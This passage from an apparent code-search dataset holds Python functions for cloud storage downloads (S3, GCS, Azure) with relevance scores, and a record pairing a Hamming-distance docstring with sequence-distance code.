parsed_s3_path[2] # Bucket name\n remote_key = parsed_s3_path[3] # Key\n self.download_file(remote_bucket, remote_key, _file)\n return _file\n except Exception as e:\n message = {'FILE': __file__.split('/')[-1],\n 'METHOD': inspect.stack()[0][3], 'EXCEPTION': str(e)}\n self.logger.exception(message)\n raise", "def do_part_download(args):\r\n bucket_name, key_name, fname, min_byte, max_byte, split, secure, max_tries, current_tries = args\r\n conn = boto.connect_s3(calling_format=OrdinaryCallingFormat())\r\n conn.is_secure = secure\r\n\r\n # Make the S3 request\r\n resp = conn.make_request(\"GET\", bucket=bucket_name,\r\n key=key_name, headers={'Range':\"bytes=%d-%d\" % (min_byte, max_byte)})\r\n\r\n # Open the target file, seek to byte offset\r\n fd = os.open(fname, os.O_WRONLY)\r\n logger.debug(\"Opening file descriptor %d, seeking to %d\" % (fd, min_byte))\r\n os.lseek(fd, min_byte, os.SEEK_SET)\r\n\r\n chunk_size = min((max_byte-min_byte), split*1024*1024)\r\n logger.debug(\"Reading HTTP stream in %dM chunks\" % (chunk_size/1024./1024))\r\n t1 = time.time()\r\n s = 0\r\n try:\r\n while True:\r\n data = resp.read(chunk_size)\r\n if data == \"\":\r\n break\r\n os.write(fd, data)\r\n s += len(data)\r\n t2 = time.time() - t1\r\n os.close(fd)\r\n s = s / 1024 / 1024.\r\n logger.debug(\"Downloaded %0.2fM in %0.2fs at %0.2fMBps\" % (s, t2, s/t2))\r\n except Exception, err:\r\n logger.debug(\"Retry request %d of max %d times\" % (current_tries, max_tries))\r\n if (current_tries > max_tries):\r\n logger.error(err)\r\n else:\r\n time.sleep(3)\r\n current_tries += 1\r\n do_part_download(bucket_name, key_name, fname, min_byte, max_byte, split, secure, max_tries, current_tries)", "def download(\n bucket: str, key: str, file_path: str, session: Optional[boto3.Session] = None\n) -> str:\n s3_client = _get_client(session)\n\n LOGGER.info(\"downloading s3://%s/%s to %s...\", bucket, key, file_path)\n s3_client.download_file(Bucket=bucket, Key=key, Filename=file_path)\n return file_path", "def download_fileobj(Fileobj=None, Bucket=None, Key=None, ExtraArgs=None, Callback=None, Config=None):\n pass", "def get(self, key):\n key = str(urllib.unquote(key)).strip()\n logging.debug('key is %s', key)\n blob_info = blobstore.BlobInfo.get(key)\n self.send_blob(blob_info)", "def load(self, bucket, key):\n\n bucket = self._build_bucket_resource(bucket)\n\n with io.BytesIO() as stream:\n bucket.download_fileobj(key, stream)\n stream.seek(0)\n\n wrapper = io.TextIOWrapper(stream, encoding='utf-8')\n # Preserve the original order\n return json.load(wrapper, object_pairs_hook=collections.OrderedDict)", "def _s3_get_file(url):\n try:\n return S3().get_contents_from_url(url)\n except Exception as e:\n raise ScrBaseException(\"Could not load file from {0}: {1}\".format(url, e))", "def s3_get(url, temp_file, proxies=None):\n\ts3_resource = boto3.resource (\"s3\", config=Config (proxies=proxies))\n\tbucket_name, s3_path = split_s3_path (url)\n\ts3_resource.Bucket (bucket_name).download_fileobj (s3_path, temp_file)", "def list_blobs(bucket_name):\n # bucket_name = \"your-bucket-name\"\n\n storage_client = storage.Client()\n print(storage_client.current_batch)\n # Note: Client.list_blobs requires at least package version 1.17.0.\n blobs = storage_client.list_blobs(bucket_name)\n\n # print(len([1 for blob in blobs]))\n for blob in blobs:\n print(blob.name)", "def get_blob_content(container_name: str, blob_path: str) -> str:\n global BLOB_SERVICE_CLIENT\n # TODO: Should add retry policy here\n if not BLOB_SERVICE_CLIENT:\n logging.info(\n f\"{HEADER} Initialize blob service client for {DATABRICKS_OUTPUT_STORAGE_ACCOUNT_URL}\")\n BLOB_SERVICE_CLIENT = BlobServiceClient(DATABRICKS_OUTPUT_STORAGE_ACCOUNT_URL,\n credential=DATABRICKS_OUTPUT_STORAGE_SAS_TOKEN)\n blob_client = BLOB_SERVICE_CLIENT.get_blob_client(container=container_name, blob=blob_path)\n content = blob_client.download_blob().content_as_text()\n return content", "def load_pickle(self, bucket, key):\n\n with BytesIO() as obj_buffer:\n self._s3.Bucket(bucket).download_fileobj(key, obj_buffer)\n obj_buffer.seek(0)\n obj = pickle.load(obj_buffer)\n\n return obj", "def copy_blob(bucket_name, blob_name, destination_bucket_name, destination_blob_name):\r\n\r\n # initialize client, get bucket, & get blob\r\n storage_client, source_bucket, source_blob = create_client(bucket_name, blob_name)\r\n\r\n # set destination bucket name\r\n destination_bucket = storage_client.bucket(destination_bucket_name)\r\n\r\n # copy blob\r\n blob_copy = source_bucket.copy_blob(\r\n source_blob, destination_bucket, destination_blob_name\r\n )\r\n\r\n print(\r\n \"blob {} in bucket {} copied to blob {} in bucket {}.\".format(\r\n source_blob.name,\r\n source_bucket.name,\r\n blob_copy.name,\r\n destination_bucket.name,\r\n )\r\n )", "def get_file(object_name: str, **kwargs) -> HTTPResponse:\n data = client.get_object(DATASETS_BUCKET, object_name, **kwargs)\n return data", "def get_object(self, bucket_name, key, stream=False, extra_get_args={}):\n url = self.__key_url(bucket_name, key)\n res = self.infinispan_client.get(url, headers=self.headers, auth=self.basicAuth)\n data = res.content\n return data", "async def read(self, size=-1):\n # read the object using the bucket and path already determined in\n # __init__, and using the connection object\n try:\n # get the file size first\n file_size = await self._getsize()\n if size== -1:\n range_start = 0\n range_end = file_size\n range_size = file_size\n else:\n range_start = self._seek_pos\n range_end = self._seek_pos+size-1\n if range_end > file_size:\n range_end = file_size-1\n range_size = range_end-range_start+1\n\n # if multipart download is not supported\n if not self._multipart_download:\n # get the full file\n s3_object = await self._conn_obj.conn.get_object(\n Bucket = self._bucket,\n Key = self._path,\n )\n body = s3_object['Body']\n data = await body.read()\n # if the file is smaller than the MAXIMUM_PART_SIZE\n elif (range_size < self._part_size):\n # the requested range is the full file, it is fastest to\n # not specify the range\n if (range_start == 0 and range_size == file_size):\n # get the full file\n s3_object = await self._conn_obj.conn.get_object(\n Bucket = self._bucket,\n Key = self._path,\n )\n # a portion of the file is requested\n else:\n s3_object = await self._conn_obj.conn.get_object(\n Bucket = self._bucket,\n Key = self._path,\n Range = 'bytes={}-{}'.format(\n range_start, range_end\n )\n )\n body = s3_object['Body']\n data = await body.read()\n # multipart download version\n else:\n \"\"\"Use range get to split up a file into the MAXIMUM_PART_SIZE\n and download each part asynchronously.\"\"\"\n # calculate the number of necessary parts\n n_parts = int(range_size / self._part_size + 1)\n # don't go above the maximum number downloadable\n if n_parts > self._max_parts:\n n_parts = self._max_parts\n # (re)calculate the download size\n part_size = float(range_size) / n_parts\n # create the tasks and assign the return data buffer\n tasks = []\n data_buf = io.BytesIO()\n\n for p in range(0, n_parts):\n event_loop = asyncio.get_event_loop()\n task = event_loop.create_task(self._read_partial_file(\n p, part_size\n ))\n tasks.append(task)\n # wait for all the tasks to finish\n results = await asyncio.gather(*tasks)\n # read each chunk of data and write into the global buffer\n for r in results:\n data_buf.write(r)\n r = None # indicate ready for garbage collection\n data_buf.seek(0)\n data = data_buf.read()\n\n except ClientError as e:\n raise IOException(\n \"Could not read from object {} {}\".format(self._path, e)\n )\n except AttributeError as e:\n self._handle_connection_exception(e)\n return data", "def download_file(file_name, bucket_name, object_name=None):\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = os.path.basename(file_name)\n\n try:\n # Download file from bucket\n response = s3.download_file(Bucket=bucket_name, Key=object_name, Filename=file_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def new_blob(self, blob_name):\n return storage.Blob(blob_name, self.bucket)", "def _do_retrieve(bucket_name, key_path, number_retries=DEFAULT_S3_RETRIES):\n try:\n return conn.get_object(Bucket=bucket_name, Key=key_path, ResponseContentType='string')\n except Exception:\n if number_retries > 0:\n print(\"s3_retrieve failed with incomplete read, retrying on %s\" % key_path)\n return _do_retrieve(bucket_name, key_path, number_retries=number_retries - 1)\n raise", "def get_file_s3(bucket, key):\n \n client = boto3.client('s3')\n return client.get_object(Bucket=bucket, Key=key)['Body'].read().decode('utf-8')", "def download(url, bucket_id, key_prefix):\n\n baseFile = '_'.join(url.split('/')[-4:]) #os.path.basename(url)\n\n #move the file to a more uniq path\n os.umask(0002)\n temp_path = \"/tmp/\"\n file = os.path.join(temp_path,baseFile)\n bucket = conn.get_bucket(bucket_id)\n key = bucket.get_key(key_prefix + baseFile, validate=False)\n s3_exists = key.exists()\n file_exists = os.path.isfile(file)\n \n if not file_exists and s3_exists:\n sys.stderr.write(\"Downloading %s from S3\\n\"%url)\n key.get_contents_to_filename(file)\n sys.stderr.write(\"Downloaded %s from S3\\n\"%url)\n elif not file_exists and not s3_exists:\n sys.stderr.write(\"Downloading %s from the web\\n\"%url)\n try:\n req = urllib2.urlopen(url)\n total_size = int(req.info().getheader('Content-Length').strip())\n downloaded = 0\n CHUNK = 256 * 10240\n with open(file, 'wb') as fp:\n while True:\n chunk = req.read(CHUNK)\n downloaded += len(chunk)\n #print math.floor( (downloaded / total_size) * 100 )\n if not chunk: break\n fp.write(chunk)\n except urllib2.HTTPError, e:\n sys.stderr.write(\"HTTP Error: %s %s\\n\"%(e.code , url))\n return False\n except urllib2.URLError, e:\n sys.stderr.write(\"URL Error: %s %s\\n\"%(e.reason , url))\n return False\n sys.stderr.write(\"Downloaded %s from the web\\n\"%url)\n\n if not s3_exists:\n sys.stderr.write(\"Uploading %s to S3\\n\"%url)\n key.set_contents_from_filename(file)\n\n sys.stderr.write(\"File ready: %s\\n\"%url)\n return file", "def delete_blob(blob_name):\n # bucket_name = \"your-bucket-name\"\n # blob_name = \"your-object-name\"\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(blob_name)\n blob.delete()\n print('Blob {} deleted.'.format(blob_name))", "def list_blobs(bucket_name):\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n\n blobs = bucket.list_blobs()\n list_blobs = [blob.public_url for blob in blobs]\n return list_blobs", "async def _download(self) -> None:\n\n # do request\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url, auth=self._auth, timeout=self._timeout) as response:\n # check response\n if response.status == 200:\n # get data and return it\n self._buffer = await response.read()\n elif response.status == 401:\n log.error(\"Wrong credentials for downloading file.\")\n raise FileNotFoundError\n else:\n log.error(\"Could not download file from filecache.\")\n raise FileNotFoundError", "def _torrent_for_blob(blob, is_public):\n # Make sure the storage has a size.\n if not blob.compressed_size:\n abort(404)\n\n # Lookup the torrent information for the storage.\n torrent_info = registry_model.get_torrent_info(blob)\n if torrent_info is None:\n abort(404)\n\n # Lookup the webseed path for the storage.\n webseed = storage.get_direct_download_url(\n blob.placements, blob.storage_path, expires_in=app.config[\"BITTORRENT_WEBSEED_LIFETIME\"]\n )\n if webseed is None:\n # We cannot support webseeds for storages that cannot provide direct downloads.\n exact_abort(501, \"Storage engine does not support seeding.\")\n\n # Load the config for building torrents.\n torrent_config = TorrentConfiguration.from_app_config(instance_keys, app.config)\n\n # Build the filename for the torrent.\n if is_public:\n name = public_torrent_filename(blob.uuid)\n else:\n user = get_authenticated_user()\n if not user:\n abort(403)\n\n name = per_user_torrent_filename(torrent_config, user.uuid, blob.uuid)\n\n # Return the torrent file.\n torrent_file = make_torrent(\n torrent_config,\n name,\n webseed,\n blob.compressed_size,\n torrent_info.piece_length,\n torrent_info.pieces,\n )\n\n headers = {\n \"Content-Type\": \"application/x-bittorrent\",\n \"Content-Disposition\": \"attachment; filename={0}.torrent\".format(name),\n }\n\n return make_response(torrent_file, 200, headers)", "def fetch(self, url) -> bytes:\n buffer = self.download(url)\n zfs = ZipFileSystem(buffer, \"r\")\n return zfs.open(zfs.glob(\"*\")[0]).read()", "def download_file_from_icos(icos_obj, bucket: str, local_file_name: str, key: str) -> None:\r\n try:\r\n icos_obj.download_file(Bucket=bucket, Key=key, Filename=local_file_name)\r\n except Exception as e:\r\n print(Exception, e)\r\n else:\r\n print('File `{}` downloaded from ICOS and saved locally as `{}`.'.format(key, local_file_name))", "def list_blobs(bucket):\n bucket = default_bucket if bucket is None else bucket\n bucket_name = bucket if isinstance(bucket, str) else bucket.name\n blobs = gcs.list_blobs(bucket_name)\n return blobs", "def download(self, key, filename):\n self.resource.Bucket(self.bucket).download_file(key, filename)\n return filename", "def download_chain(s3_path, local_path, bucket_name='lwr-inverse-us-east'):\n s3 = boto3.resource(\"s3\")\n lwr_AIES = s3.Bucket(bucket_name)\n try:\n lwr_AIES.download_file(Key=s3_path, Filename=local_path)\n print(\"Download successful\")\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == \"404\":\n print(\"The object does not exist.\")\n else:\n raise", "def list_blobs(bucket_name):\n storage_client = storage.Client()\n\n # Note: Client.list_blobs requires at least package version 1.17.0.\n blobs = storage_client.list_blobs(bucket_name)\n\n return blobs", "def upload_to_bucket(blob_name, file, bucket_name):\n\n # Explicitly use service account credentials by specifying the private key\n # file.\n storage_client = storage.Client.from_service_account_json('creds.json')\n\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(blob_name)\n blob.upload_from_file(file)\n\n # returns a public url\n return blob.public_url", "def get_file_download(self, bucket_id, file_id):\n\n \n path = '/storage/buckets/{bucketId}/files/{fileId}/download'\n params = {}\n if bucket_id is None:\n raise AppwriteException('Missing required parameter: \"bucket_id\"')\n\n if file_id is None:\n raise AppwriteException('Missing required parameter: \"file_id\"')\n\n path = path.replace('{bucketId}', bucket_id)\n path = path.replace('{fileId}', file_id)\n\n\n return self.client.call('get', path, {\n 'content-type': 'application/json',\n }, params)", "def download_from_s3(self, filename: str, filename_output: Optional[str] = None) -> str:\n if self.aws_access_key_id is None:\n raise Exception(\n 'To use `download_from_s3` you need to pass '\n '`aws_access_key_id` and '\n '`aws_secret_access_key`'\n )\n\n s3 = boto3.client('s3',\n aws_access_key_id=self.aws_access_key_id,\n aws_secret_access_key=self.aws_secret_access_key)\n\n # Progress bar\n meta_data = s3.head_object(Bucket=self.bucket_name, Key=filename)\n size = int(meta_data.get('ContentLength', 0))\n progress_bar = self._progress(size)\n\n # Downloading file\n s3.download_file(self.bucket_name, filename,\n filename if filename_output is None else filename_output,\n Callback=progress_bar)", "def download(self, bucket_name, key_name, fname):\n dname = os.path.dirname(fname)\n if dname and not os.path.exists(dname):\n os.makedirs(dname)\n bucket = self.s3_.get_bucket(bucket_name)\n key = bucket.get_key(key_name)\n return key.get_contents_to_filename(fname)", "def fetch(iid):\n if AWS_CLIENT_CONFIG and BUCKET_NAME:\n try:\n s3 = boto3.resource('s3', **AWS_CLIENT_CONFIG)\n obj = s3.Bucket(BUCKET_NAME).Object(iid).get()\n if obj:\n return obj.get('Body')\n except botocore.exceptions.ClientError as e:\n logger.error(e)\n else:\n # get locally from temp dir (tests, local development)\n return get_temp_file(iid)\n return None", "def fetch_and_extract(self, filename):\n # type: (Text) -> None\n\n with io.open(filename, 'wb') as f:\n self.bucket.download_fileobj(filename, f)\n with tarfile.open(filename, \"r:gz\") as tar:\n tar.extractall(self.data_dir)", "def get_object(self, container_name, object_name, download_path):\n obj = self.client.get_object(container_name, object_name)\n with open(download_path + object_name, 'w') as test_file:\n test_file.write(obj[1])\n return True", "def _download(self):\n self._system.download_file(\"http://curl.haxx.se/download/\" + self._tar_name)", "def download(handle):\n storage = get_storage()\n # FIXME: 404 if not found or invalid?\n return storage.route(handle)", "def get_remote_bytes(file_url) -> io.BytesIO:\n result = urlfetch.fetch(file_url)\n return io.BytesIO(result.content)" ]
[ "0.8135342", "0.8125911", "0.78897315", "0.7834108", "0.77213085", "0.77190185", "0.7650273", "0.7502587", "0.7473543", "0.7457528", "0.73454875", "0.7343923", "0.7278197", "0.72137046", "0.71286523", "0.708186", "0.70657223", "0.6937438", "0.6928341", "0.6895048", "0.6828916", "0.6771264", "0.65662736", "0.65052044", "0.6439699", "0.64299065", "0.64165443", "0.64096147", "0.6397792", "0.63941276", "0.6387207", "0.63418454", "0.63155097", "0.6271182", "0.6262031", "0.62416875", "0.62064576", "0.61968625", "0.615706", "0.6153955", "0.61239", "0.6112361", "0.609456", "0.60913855", "0.6089229", "0.60711336", "0.60594225", "0.6041942", "0.6041942", "0.60041636", "0.6000635", "0.599157", "0.5967848", "0.5921954", "0.59100556", "0.58937657", "0.5890353", "0.5889838", "0.5866992", "0.5866484", "0.58520347", "0.584858", "0.58248377", "0.5798647", "0.5765319", "0.5751928", "0.5750818", "0.5738986", "0.56954867", "0.5694998", "0.56945753", "0.5689315", "0.5688384", "0.56800324", "0.56714934", "0.5670415", "0.5670412", "0.56662875", "0.56604934", "0.5657895", "0.5651305", "0.5647332", "0.5645261", "0.56373215", "0.56352055", "0.56172353", "0.56161845", "0.5615064", "0.56118864", "0.56056833", "0.56045973", "0.5587712", "0.55865866", "0.55470014", "0.5544278", "0.5541974", "0.5538803", "0.5535373", "0.55339414", "0.55260605" ]
0.7573154
7
Computes the hamming distance for sequences in seqs_mat indicated by pairs of indices.
def nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths=True): return _nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def hamming_distance(s1, s2):\n assert(len(s1) == len(s2))\n return np.sum([1 if c1 != c2 else 0 for c1, c2 in zip(s1, s2)])", "def hamming_distance(s1, s2):\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal lenght.\")\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))", "def hamming_dist(seq1, seq2):\n diffs = 0\n length = 0\n for x, y in zip(str(seq1), str(seq2)):\n if x == '-' or y == '-':\n continue\n elif x != y:\n diffs += 1\n length += 1\n try:\n return float(diffs) / length\n except:\n return 0.5", "def hamming_distance(s1, s2):\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))", "def hamming_distance(s1, s2):\n assert len(s1)==len(s2), \",\".join((s1, s2))\n s1 = np.array(s1.upper(), dtype=\"c\")\n s2 = np.array(s2.upper(), dtype=\"c\")\n return np.sum(s1 != s2)", "def hamming_distance(x1: np.ndarray, x2: np.ndarray) -> int:\n assert isinstance(x1, np.ndarray) and isinstance(x2, np.ndarray)\n return (x1 != x2).sum()", "def hamming_distance(words: Iterator[str], vocabulary: Dict[str, int]):\n\n for word in words:\n distances = []\n suggestions = []\n vocab_list = list(vocabulary)\n for (i,vocab) in enumerate(vocab_list):\n if len(vocab) == len(word):\n distances.append(hamming(word, vocab))\n else:\n distances.append(120)\n \n idx = np.array(distances).argsort()[:5]\n \n for i in range(5):\n for j in range(i+1,5):\n if distances[idx[i]] == distances[idx[j]]:\n if vocabulary.get(vocab_list[idx[i]]) < vocabulary.get(vocab_list[idx[j]]):\n temp = idx[i] \n idx[i] = idx[j]\n idx[j] = temp \n\n for i in idx:\n suggestions.append(vocab_list[i])\n\n output(\"{misspelled}\\t{corrections}\".format(\n misspelled=word,\n corrections=\"\\t\".join(suggestions)\n )) # may cause IO bottleneck", "def hamming_distance(s1, s2):\n if len(s1) > len(s2):\n s2 = s2.ljust(len(s1))\n else:\n s1 = s1.ljust(len(s2))\n\n return sum(el1 != el2 for el1, el2 in zip(s1, s2))", "def hamming_distance(a, b):\n return np.count_nonzero(a != b)", "def _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n mx_L = nb.int_(np.max(seqs_L))\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n \n \"\"\"As long as ldmat is big enough to accomodate the largest sequence\n its OK to only use part of it for the smaller sequences\n NOTE that to create a 2D array it must be created 1D and reshaped\"\"\"\n ldmat = np.zeros(mx_L * mx_L, dtype=np.int16).reshape((mx_L, mx_L))\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n \n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n #tmp_dist = 0\n for i in range(q_L):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]]\n #dist[ind_i] = tmp_dist\n continue\n \n \"\"\"Do not need to re-zero each time\"\"\"\n # ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seqs_mat[query_i, row-1], seqs_mat[seq_i, col-1]]) # substitution\n dist[ind_i] = ldmat[row, col]\n return dist", "def hamming_dist(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.HammingDistance()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n\n # Call the function to compute the distance\n return measure.get_raw_score(s1, s2)", "def hamming_distance(cs):\n d = 0.0\n end = len(cs) - 1\n for idx in range(end):\n s1 = cs[idx]\n s2 = cs[idx + 1]\n assert len(s1) == len(s2)\n s1_bits = ''.join('{:b}'.format(c).zfill(8) for c in s1)\n s2_bits = ''.join('{:b}'.format(c).zfill(8) for c in s2)\n d += sum(c1 != c2 for c1, c2 in zip(s1_bits, s2_bits))\n return d / end", "def hamming_distance(a, b):\n assert len(a) == len(b)\n dist = sum(item_a != item_b for item_a, item_b in zip(a, b))\n return dist", "def _PD_hamming(alignA, alignB, subst, bySite, withinA, ignoreGaps=True):\n L = len(alignA.iloc[0])\n gapCode = AA2CODE['-']\n\n \"\"\"Convert alignments into integer arrays first to speed comparisons\"\"\"\n matA = np.zeros((len(alignA), L))\n for seqi, s in enumerate(alignA):\n matA[seqi,:] = _seq2vec(s)\n if not withinA:\n matB = np.zeros((len(alignB), L))\n for seqi, s in enumerate(alignB):\n matB[seqi,:] = _seq2vec(s)\n\n \"\"\"Dist will be 1 where equal, 0 where not and nan if one is a gap\"\"\"\n if withinA:\n dist=np.zeros((int(scipy.special.comb(len(alignA), 2)), L))\n allPairs = itertools.combinations(np.arange(len(alignA)), 2)\n for j, (seqi1, seqi2) in enumerate(allPairs):\n dist[j,:] = matA[seqi1,:]!=matA[seqi2,:]\n if ignoreGaps:\n gapInd = (matA[seqi1,:]==gapCode) | (matA[seqi2,:]==gapCode)\n dist[j, gapInd] = np.nan\n else:\n dist=np.zeros((len(alignA)*len(alignB), L))\n allPairs = itertools.product(np.arange(len(alignA)), np.arange(len(alignB)))\n for j, (seqiA, seqiB) in enumerate(allPairs):\n dist[j,:] = matA[seqiA,:]!=matB[seqiB,:]\n if ignoreGaps:\n gapInd = (matA[seqiA,:]==gapCode) | (matB[seqiB,:]==gapCode)\n dist[j, gapInd] = np.nan\n\n if not bySite:\n dist=np.nanmean(dist, axis=1)\n return np.nanmean(dist, axis=0)", "def hammingDistance(s1 = \"\", s2 = \"\"):\n # if len(s1) != len(s2):\n # raise ValueError(\"Undefined for sequences of unequal length\")\n return sum(bool(ord(ch1) - ord(ch2)) for ch1, ch2 in zip(s1, s2))", "def hamming_dist(self):\r\n distance = 0\r\n distance = abs(len(self.s1) - len(self.s2))\r\n distance += sum(i1 != i2 for i1,i2 in zip(self.s2,self.s1))\r\n return distance", "def hamming_distance(lhs,rhs):\n return len([(x,y) for x,y in zip(lhs,rhs) if x !=y])", "def distance_matrix(sequences, substitution_mat):\n distance_mat = numpy.empty((len(sequences), len(sequences)), dtype='float')\n\n print(\"Building distance matrix\")\n # Get similarity score\n for i, seqA in enumerate(sequences):\n sys.stdout.write(\"\\r%.f%%\" % (float(i+1)/len(sequences)*100))\n sys.stdout.flush()\n for j, seqB in enumerate(sequences[i:], start=i):\n score = substitution_score(substitution_mat, seqA, seqB)\n distance_mat[i, j] = score\n distance_mat[j, i] = score\n print(\"\")\n # Set equal the diagonal\n diag_mini = numpy.min(distance_mat.diagonal())\n for i in range(len(sequences)):\n distance_mat[i, i] = diag_mini\n # Convert similarity score into a distance\n mini = numpy.min(distance_mat)\n maxi = numpy.max(distance_mat)\n return 1 - (distance_mat + abs(mini))/(maxi - mini)", "def hamming_dist(a_b, b_b):\n return sum(bin(a_b[n] ^ b_b[n]).count('1') for n in range(len(a_b)))", "def hamdist(inp):\n\treturn sum(c1 != c2 for c1, c2 in itertools.izip(inp[0],inp[1]))", "def get_all_distances(cls, indices, dist_mat):\n distances = []\n for i, j in combinations(indices, 2):\n distances.append(cls.get_dist(dist_mat, i, j))\n return distances", "def __hamming_distance(s1, s2):\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal length\")\n return sum(el1 != el2 for el1, el2 in zip(s1, s2))", "def hamming_dist(v1, v2):\r\n edits = (v1 != v2)\r\n return edits.sum()", "def hamming_dist(gene_1, gene_2):\n ham_dist = 0\n for c1, c2 in zip(gene_1, gene_2):\n if c1 != c2:\n ham_dist += 1\n return ham_dist", "def countingPointMutations(seq1, seq2):\n seqLength = len(list(seq1))\n \n hammingDistance=0;\n for i in range(0,seqLength):\n if list(seq1)[i]!=list(seq2)[i]:\n hammingDistance = hammingDistance+1;\n return hammingDistance", "def hamming(seq1, seq2) -> int:\n if type(seq1) is SeqRecord:\n return hamming(seq1.seq, seq2)\n elif type(seq2) is SeqRecord:\n return hamming(seq1, seq2.seq)\n elif (type(seq1) is str or type(seq1) is Seq) and (type(seq2) is Seq or type(seq2) is str):\n if len(seq1) != len(seq2):\n raise ValueError('The sequences are of different lengths!')\n else:\n distance = 0\n for i in range(len(seq1)):\n if seq1[i] != seq2[i]:\n distance += 1\n return distance\n else:\n raise TypeError('Wrong type.')", "def hard_example_mining(dist_mat, is_pos, is_neg):\n\n assert len(dist_mat.size()) == 2\n\n # `dist_ap` means distance(anchor, positive)\n # both `dist_ap` and `relative_p_inds` with shape [N]\n dist_ap, _ = torch.max(dist_mat * is_pos, dim=1)\n # `dist_an` means distance(anchor, negative)\n # both `dist_an` and `relative_n_inds` with shape [N]\n inf = dist_mat.max() + 1\n dist_an, _ = torch.min(dist_mat * is_neg + is_pos * inf, dim=1)\n\n return dist_ap, dist_an", "def sim_mat(fc7_feats):\n print(\"Something\")\n t = time.time()\n pdist_ = spatial.distance.pdist(fc7_feats)\n print('Created distance matrix' + ' ' + str(time.time() - t) + ' sec')\n\n t = time.time()\n dist_mat = spatial.distance.squareform(pdist_)\n print('Created square distance matrix' + ' ' + str(time.time() - t) + ' sec')\n del pdist_\n\n t = time.time()\n sigmas = np.sort(dist_mat, axis=1)[:, 7] + 1e-16\n matrice_prodotti_sigma = np.dot(sigmas[:, np.newaxis], sigmas[np.newaxis, :])\n print('Generated Sigmas' + ' ' + str(time.time() - t) + ' sec')\n\n t = time.time()\n dist_mat /= -matrice_prodotti_sigma\n print('Computed dists/-sigmas' + ' ' + str(time.time() - t) + ' sec')\n\n del matrice_prodotti_sigma\n\n t = time.time()\n W = np.exp(dist_mat, dist_mat)\n # W = np.exp(-(dist_mat / matrice_prodotti_sigma))\n np.fill_diagonal(W, 0.)\n\n # sparsify the matrix\n k = int(np.floor(np.log2(fc7_feats.shape[0])) + 1)\n n = W.shape[0]\n print('Created inplace similarity matrix' + ' ' + str(time.time() - t) + ' sec')\n\n t = time.time()\n for x in W:\n x[np.argpartition(x, n - k)[:(n - k)]] = 0.0\n\n print('Sparsify the matrix' + ' ' + str(time.time() - t) + ' sec')\n\n t = time.time()\n # matrix_S = np.zeros((n, n))\n m1 = W[np.triu_indices(n, k=1)]\n m2 = W.T[np.triu_indices(n, k=1)]\n\n W = spatial.distance.squareform(np.maximum(m1, m2))\n print('Symmetrized the similarity matrix' + ' ' + str(time.time() - t) + ' sec')\n\n return W", "def get_adjacent_distances(dist_matrix_header,\r\n dist_matrix,\r\n sample_ids,\r\n strict=False):\r\n filtered_idx = []\r\n filtered_sids = []\r\n for sid in sample_ids:\r\n try:\r\n idx = dist_matrix_header.index(sid)\r\n except ValueError:\r\n if strict:\r\n raise ValueError(\r\n \"Sample ID (%s) is not present in distance matrix\" %\r\n sid)\r\n else:\r\n pass\r\n else:\r\n filtered_idx.append(idx)\r\n filtered_sids.append(sid)\r\n\r\n if len(filtered_idx) < 2:\r\n raise ValueError(\"At least two of your sample_ids must be present in the\"\r\n \" distance matrix. %d are present.\" % len(filtered_idx))\r\n\r\n distance_results = []\r\n header_results = []\r\n for i in range(len(filtered_idx) - 1):\r\n distance_results.append(\r\n dist_matrix[filtered_idx[i]][filtered_idx[i + 1]])\r\n header_results.append(\r\n (filtered_sids[i], filtered_sids[i + 1]))\r\n return distance_results, header_results", "def calculate_dist_mat(embeddings: np.ndarray, norm: int) -> np.ndarray:\n kwargs = {'p': norm}\n condensed_dist = pdist(embeddings, metric='minkowski', **kwargs)\n dist_mat = squareform(condensed_dist)\n return dist_mat", "def pairwise_cosine(mat):\n def cosine_similarity(a, b):\n return (a * b).sum() / (np.linalg.norm(a) * np.linalg.norm(b))\n\n n = len(mat)\n dist_mat = np.zeros((n, n))\n for i in range(n):\n for j in range(i + 1, n):\n dist = cosine_similarity(mat[i], mat[j])\n dist_mat[i, j] = dist\n dist_mat[j, i] = dist\n\n dist_mat[np.isnan(dist_mat)] = 0\n\n return dist_mat", "def hamming_distance(v_est, v_true):\n assert(v_est.shape == v_true.shape)\n\n return 1 / len(v_est) * np.sum(v_est != v_true)", "def hamming_sim(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.HammingDistance()\n\n s1 = 